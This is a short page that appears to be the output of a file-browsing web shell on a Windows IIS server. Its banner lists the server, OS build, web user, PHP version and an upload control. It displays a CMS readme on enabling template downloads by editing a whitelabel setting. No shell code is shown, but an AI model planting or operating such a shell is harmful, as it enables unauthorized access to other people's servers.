HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/PvdBoogaard/indoorski.nl/backup/oude-site/cms/ENABLE TEMPLATE DOWNLOADS.txt
By default the ability to download templates is disabled, we did this to protect your safety.

To enable please follow these steps:

1. Open admin/whitelabel.php
2. Change the line (true means disable, false means enable)
 $whiteLabel['DisableTemplateDownloading'] = true;
	to
 $whiteLabel['DisableTemplateDownloading'] = false;
3. Save the file!